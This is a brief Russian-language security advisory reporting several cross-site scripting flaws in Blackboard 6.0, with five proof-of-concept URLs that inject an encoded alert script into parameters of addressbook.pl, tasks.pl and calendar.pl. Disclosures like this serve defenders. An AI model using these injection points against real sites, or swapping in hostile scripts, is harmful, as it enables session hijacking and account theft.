Программа: Blackboard 6.0
Несколько уязвимостей обнаружено в Blackboard. Удаленный пользователь может выполнить XSS нападение.
http://[victim]/bin/common/addressbook.pl?action= ADD&nav=my_addressbook&course=
'%3E%3Cscript%3Ealert('Vulnerable') %3C/script%3E
http://[victim]/bin/common/tasks.pl?action=c &display=T.subject&filter=--!!all&course_id=
&render_type='%3E%3Cscript%3Ealert('Vulnerable')%3C/
http
://[victim]/bin/common/calendar.pl?course_name =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E
http://[victim]/bin/common/calendar.pl?courseID =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E
http://[victim]/bin/common/calendar.pl?subroutine =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E